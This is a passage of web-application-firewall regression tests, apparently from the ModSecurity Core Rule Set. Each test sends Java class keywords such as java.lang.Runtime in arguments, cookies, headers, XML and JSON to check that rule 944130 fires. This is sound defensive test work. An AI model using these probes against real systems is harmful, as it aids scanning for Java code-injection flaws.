"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-331 - desc: "Argument name includes keyword java.lang.reflect" - stages: - - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.reflect=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-332 - desc: "Cookie test includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.reflect - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-333 - desc: "Cookie name includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.reflect=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-334 - desc: "Request header test includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.reflect - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-335 - desc: "XML attribute value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-336 - desc: "XML element value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-337 - desc: "Nested XML element value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-338 - desc: "Content-Type text/plain includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-339 - desc: "Content-Type application/json arg value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-340 - desc: "Content-Type application/json arg name includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-341 - desc: "Argument test includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-342 - desc: "Argument name includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-343 - desc: "Cookie test includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-344 - desc: "Cookie name includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-345 - desc: "Request header test includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-346 - desc: "XML attribute value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" 
- version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-347 - desc: "XML element value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-348 - desc: "Nested XML element value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-349 - desc: "Content-Type text/plain includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-350 - desc: "Content-Type application/json 
arg value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-351 - desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-352 - desc: "Argument test includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-353 - desc: "Argument name includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - 
port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-354 - desc: "Cookie test includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-355 - desc: "Cookie name includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-356 - desc: "Request header test includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 
Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-357 - desc: "XML attribute value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-358 - desc: "XML element value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-359 - desc: "Nested XML element value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-360 - desc: "Content-Type text/plain includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-361 - desc: "Content-Type application/json arg value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-362 - desc: "Content-Type application/json arg name includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-363 - desc: "Argument test includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-364 - desc: "Argument name includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-365 - desc: "Cookie test includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
test=java.lang.StringBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-366 - desc: "Cookie name includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-367 - desc: "Request header test includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-368 - desc: "XML attribute value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - 
data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-369 - desc: "XML element value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-370 - desc: "Nested XML element value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-371 - desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-372 - desc: "Content-Type 
application/json arg value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-373 - desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-374 - desc: "Argument test includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-375 - desc: "Argument name includes keyword java.lang.System" - stages: - - - 
